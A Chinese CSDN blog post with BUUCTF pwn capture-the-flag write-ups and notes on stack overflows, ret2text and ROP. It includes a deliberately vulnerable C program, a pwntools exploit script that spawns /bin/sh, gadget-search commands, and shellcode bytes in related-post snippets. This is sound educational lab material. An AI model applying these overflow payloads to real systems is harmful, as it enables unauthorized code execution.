pwn 1

最新推荐文章于 2024-05-30 14:41:17 发布
最新推荐文章于 2024-05-30 14:41:17 发布
阅读量1.5k 收藏 32
点赞数 54
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80471032/article/details/135965806
版权

Buuctf前四题

(一)test_your_nc

1.下载文件,将文件放到ida中静态分析

2cbfda7552fb4a12800f6599a4078fa2.png

2.F5查看反编译的代码,main函数中发现只有system

fec7b029f48d43a2a9cb5c1bf46518de.png

 4.写执行命令拿到flag

e4246e090907450a92f4eb858fe46b30.png

1bb8e2b9257a43ebabbcf2f4a3cb71b6.png

 5.复制提交

(二)rip

1.终端输入chechswc pwn1查看文件

2.将文件用ida打开

8a7b06d3277145bea11defbaeb419117.png

 3.F5查看反编译后的代码,在列表的fun函数中找到system

3ddb6d27186f484c894765dff28b0177.png

4.找到其首地址

5.计算偏移量

6.写脚本

cdda0e58bb91408b834cd0e47db650c0.png

 运行,得到flag

1fcec85d5bf2415384340b64485356a7.png

 (三)warmup_csaw_2016

 1.checksec查看文件

2.将文件用ida打开,按shift+F12查看字符串,找到cat flag.txt

3564546f759848b18814b904ba252cc9.png

3.双击进入,发现其相关函数

9f66e076743c49b4b09e4d63fd383e6f.png

 4.找到相关函数,F5反编译,发现system

c8bd1422a6054cb6a3100f08ef8c07cd.png

 5.找到函数地址

4b70658bcdac4196951f3c4ddab4f73d.png

 6.查看主函数,计算偏移量

7.编写脚本,运行得出flag

633f634af4d548a781e3f5f2ec823102.png

679103ef606543e7b3c56f15bf66fb22.png 

 (四)ciscn_2019_n_1

1.checksec查看文件

2.将文件用ida打开,F5反编译,发现func函数中有flag文件

36faca9f7bfc441caf5109c852be5381.png

 3.计算溢出量

4.写脚本,运行得flag

46dcce5225c14bec9d3c6f54211414cd.png

 (十四)baby_rop

1.checksec查看文件

2.将文件用ida打开,shift+F12查看字符串,找到system和/bin/sh,双击找到地址

fb4a9b79c59143238017568b32b16afe.png

fb61319a430a437a80b67dd0d8c588ac.png 

76f2b2d26323418d9f75bb6f3285f12b.png

3.F5反编译,查看主函数,计算

138f1aeb7c794e4281a0b7f0a331d381.png

4.写脚本,运行得到flag

ec87ce561c5143638b71861c1d16bbfa.png

笔记

不同架构下寄存器传参方式

64位x86架构

1.RDI (Destination Index): 用于传递第一个整数参数。

2.RSI (Source Index): 用于传递第二个整数参数。

3.RDX (Data Register): 用于传递第三个整数参数。

4.RCX (Counter Register): 用于传递第四个整数参数。

5.R8: 用于传递第五个整数参数。

6.R9: 用于传递第六个整数参数。

若参数超过6个,超过参数用栈传递

32位架构

参数直接用栈传递

ret2text

原理

ret2text的原理是控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。

前置条件

1.程序存在栈溢出漏洞,可以覆盖返回地址。

2.程序.text段中存在可以执行恶意命令的代码片段,或者可以利用ROP技术拼接多个代码片段。

3.程序没有开启地址随机化或者可以泄露地址信息,可以确定代码片段的地址。

构造ROP传参

多数函数并不会直接将“shell = '/bin/sh'”这种危险字符串和system函数放在一起,此时就需要传参。

32位中构造ROP传参

#include<stdio.h>

#include<stdlib.h>

#include<unistd.h>

char shell[] = "/bin/sh";

int func(char *cmd){

    system(shell);

    return 0;

}

int dofunc(){

    char a[8]={};

    write(1,"inputs: ",7);

    read(0,a,0x100);

    return 0;

}

int main(){

    dofunc();

    return 0;

}

 

利用溢出覆盖返回地址进入func函数内部,再将参数一指向“/bin/sh”的储存地址即可。其中要注意的是r处需要我们进行垃圾数据的填充。

 

from pwn import *

#配置信息

context(log_level='debug',arch='i386',os='linux')

#context(arch='arm64',os='linux')

#打开路径

file = './ret2text_func2_x86'

io = process(file)

elf = ELF(file)

#注入信息

sh_addr = 0x804c018

#ret_addr = 0x8049186

ret_addr = elf.symbols['func']

padding = 0x14

payload = padding*b'a' + p32(ret_addr) + p32(0) + p32(sh_addr)

dem = b'inputs:'

io.sendlineafter(dem,payload)

io.interactive()

64位中构造ROP传参

对x64的参数,大部分情况下,前六个参数储存在寄存器内,无法直接使用简单的栈溢出修改寄存器内容,这时候我们需要解除ROPgadget工具进行辅助。

ROP(Return Oriented Programming),即返回导向编程,通过栈溢出内容覆盖返回地址,使其跳转到可执行文件中已有的片段代码中执行我们选择的代码段。

知道了ROP工具的功能,我们需要做的是

1.修改rdi的值(可使用代码pop rdi ; ret)

2.在栈中放入‘bin/sh’经由pop提交给rdi

3.进入func函数内调用system函数

 利用ROPgadget查找需要的代码行--pop rdi ; ret

ROPgadget --binary ret2text_func2_x64 --only 'pop|ret'

也可用ropper查询。

ropper --file 文件名 --search "pop|ret"

 

 

 

 

 

 

 

 

 

 

 

那英姐关门弟子
关注
  • 54
    点赞
  • 32
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
习题--pwn1
m0_49959202的博客
09-18 137
文章目录pwn11.程序分析2.栈帧设计3.exp编写 pwn1 1.程序分析 首先file一下,发现是32位程序: checksec一下,发现栈段可以执行: ida分析,main函数内部调用了vulnerable_function(),可以用来栈溢出: 同时发现上面的printh可以用来泄露buf的地址,因此可以将shellcode填上buf处,然后根据泄露的地址再跳回来执行shellcode 程序一下,可以查看到泄露的buf地址: gdb调试发现需要淹没的长度为:0xffffd2d8−0xfff
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
pwn1
King
11-17 393
pwn1 1、将程序拖入IDA,找到主函数,按F5查看伪代码 2、程序的执行流程是通过gets()函数输入变量v4,如果变量v5等于440039336819(这是一个字符串,可以选中后,按r键,查看反向的字符串),则执行backdoor()函数 3、进入backdoor()函数,可以发现函数返回了system("/bin/sh") 4、我们想到可以通过覆盖变量的方式来达到控制程序执行流程的目的...
ctfshow pwn1
qq_39980610的博客
08-19 294
pwn1
pwn1_sctf_2016
qq_41696518的博客
07-13 200
pwn1_sctf_2016
BUUCTF pwn1_sctf_2016
m0_54262894的博客
10-27 175
拿到文件先checksec,32位的文件,并且只开启了NX保护 查看main函数 没有什么东西,双击进入vuln() 通过代码可以知道我们输入的I都会被replace函数替换为you 而且s的长度为0x3c,也就是60个字节,可我们最多能够输入32个字符 所以需要输入20个I来填充0x3c这个长度 紧接着又发现了让人开心的东西 在函数列表里面有一个get_flag函数,打开它会发现cat flag.txt命令 并且我们记下他的地...
[每日一PWN]BUUCTF pwn1_sctf_2016
qq_55233040的博客
11-22 243
本题是利用字符替换达成溢出。
PWN1|WP
l2645470582_的博客
04-11 633
1.检查保护机制 开启了堆栈保护 2.用32位IDA打开该文件 1.shift+f12查看字符串,我们看到有“/bin/sh”关键字符串字样 2. system("/bin/sh")地址为0x0804863A 3.进入main函数,我们看到gets()危险函数 因为gets()函数不限制用户输入,s长度为0x64,所以造成溢出 4.gdb调试 (1)cyclic 200 生成200个有序字符 (2)gdb ./pwn1 run命令运行 g...
攻防世界pwn——pwn1
qq_62076255的博客
12-21 428
做题记录
gwctf_2019_jiandan_pwn1
z1r0的博客
04-07 242
gwctf_2019_jiandan_pwn1 查看保护 栈溢出,但是会溢出覆盖掉v4,v4是控制数组的,所以我们需要计算好0x110 - 4时候v4的值,然后ret2libc3就可以了 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') ll = l
攻防世界--pwn1
qq_73149934的博客
02-22 479
canary,ret2libc 注意:只能打通远端,且libc中的systembinsh没用,用onegadget打通,在用onegadget时,注意rax需要为0,通过汇编看出选择3.exit退出时rax清0,可以onegadget Exp she_i386_20=b"\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" she_amd64_30=b"\x48\x31\xd2\x48\xbb
pwn1 一道pwn练习题
05-07
pwn练习题
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
《网络与系统攻防技术》实验一:pwn1文件反汇编
03-29
《网络与系统攻防技术》实验一:pwn1文件反汇编
Pwn入门指北1
08-03
1. 各大主流平台汇编语言,例如x86与arm 2. C语言 5. 计算机组成原理 6. 计算机操作系统 7. 编译原理 1 . 关于环境 2 . 面向萌新的一
登录安全分析报告:小米官网注册
Explinks的博客
05-29 1141
图形验证及交互验证方式的安全性到底如何?请看具体分析。
云端数据提取:安全、高效地利用无限资源
最新发布
Shaidou_Data的博客
05-30 742
随着技术的不断进步和安全威胁的不断演变,企业和组织必须持续关注和更新他们的数据处理策略,以应对未来可能出现的新挑战。然而,随着数据的指数级增长,数据的安全性和高效的数据处理成为了企业最为关心的议题之一。在云计算环境中,数据安全面临着多方面的挑战,包括但不限于未经授权的数据访问、数据泄露、以及数据在传输过程中的截取等。数据提取是数据处理流程中的第一步,它涉及从各种源系统中检索所需数据的过程。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 1111
防火墙是一种网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受未经授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
富格林:谨防被骗实现安全交易
fgl100的博客
05-30 393
富格林指出,进行现货黄金投资的时候,有不少投资者都会犯下这个危及安全交易的毛病,就是没有合理控制好交易成本。如果投资成本没有控制好,把自己账户资金的全部都放进去,那么一旦逆势波动,就可能会发生爆仓的情况。成本和仓位不混为一谈,有些投资者认为成本和仓位是一样的,但并不是的,成本是投资者,投入多少金额的。如果投资的仓位较大,成本也会大,但是成本大,仓位不一定大,同时大仓位带来的收益与风险是并存的。以上的是富格林分享的控制费用成本的实用方法,有助于帮助投资者通过减少支出,从而增加利润。
Mac m1配置pwn
09-02
- *1* *3* [在Apple Silicon(M1)上搭建pwn解题环境](https://blog.csdn.net/qq_25755011/article/details/115541221)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值